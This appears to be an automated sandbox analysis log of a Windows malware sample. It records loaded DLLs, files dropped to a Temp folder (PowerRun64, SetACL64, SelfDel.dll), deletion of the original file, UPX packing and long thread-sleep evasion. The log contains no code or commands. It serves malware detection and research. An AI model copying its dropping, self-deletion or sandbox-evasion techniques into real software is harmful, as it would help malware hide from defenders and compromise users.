Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: KYagm8gq5S.exeStatic file information: File size 2666282 > 1048576
Source: KYagm8gq5S.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source: Binary string: E:\clr\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: dotNetFx45_Full_setup.exe.0.dr
Source: Binary string: boxstub.pdb source: dotNetFx40_Full_setup.exe.0.dr
Source: Binary string: D:\Download\Download\obj\Release\curl.pdb source: nggwslounqxvwf.exe, 00000005.00000000.1694869957.0000000000FD2000.00000002.00000001.01000000.00000005.sdmp, nggwslounqxvwf.exe.0.dr
Source: Binary string: C:\Users\John\Downloads\calculator-winforms-app-main\BasicCalculator\obj\Release\BasicCalculator.pdb source: BasicCalculator1.exe.0.dr
Source: Binary string: C:\Users\John\Downloads\calculator-winforms-app-main\BasicCalculator\obj\Release\BasicCalculator.pdb Q:Q ,Q_CorExeMainmscoree.dll source: BasicCalculator1.exe.0.dr
Source: Binary string: C:\Users\John\Documents\Visual Studio 2022\Projects\App\App\obj\Release\WebView.pdb source: WebView.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr
Source: nggwslounqxvwf.exe.0.drStatic PE information: 0xE4F9916F [Tue Sep 25 12:15:43 2091 UTC]
Source: dotNetFx40_Full_setup.exe.0.drStatic PE information: section name: .boxld01
Source: dotNetFx45_Full_setup.exe.0.drStatic PE information: section name: .boxld01
Source: SetACL64.exe.0.drStatic PE information: section name: _RDATA
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\WebView.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\BasicCalculator1.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx40_Full_setup.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx45_Full_setup.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SetACL64.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dllJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nsExec.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\explorer.exeFile deleted: c:\users\user\desktop\kyagm8gq5s.exeJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeMemory allocated: 1830000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeMemory allocated: 3640000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeMemory allocated: 19B0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeWindow / User API: threadDelayed 1194Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeWindow / User API: threadDelayed 3815Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\WebView.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\BasicCalculator1.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx40_Full_setup.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx45_Full_setup.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SetACL64.exeJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dllJump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7476Thread sleep count: 1194 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -99828s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -99703s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -99591s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7504Thread sleep count: 3815 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -99473s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -99349s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -99232s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -99124s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -99012s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -98885s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -98781s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -98671s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -98562s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -98453s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -98343s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -98234s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -98125s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -98015s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -97906s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -97796s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -97687s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -97578s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -97468s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -97359s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468Thread sleep time: -97250s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7496Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7452Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C60
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 99828Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 99703Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 99591Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 99473Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 99349Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 99232Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 99124Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 99012Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 98885Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 98781Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 98671Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 98562Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 98453Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 98343Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 98234Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 98125Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 98015Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 97906Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 97796Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 97687Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 97578Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 97468Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 97359Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 97250Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: netsh.exe, 00000003.00000002.1688950019.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
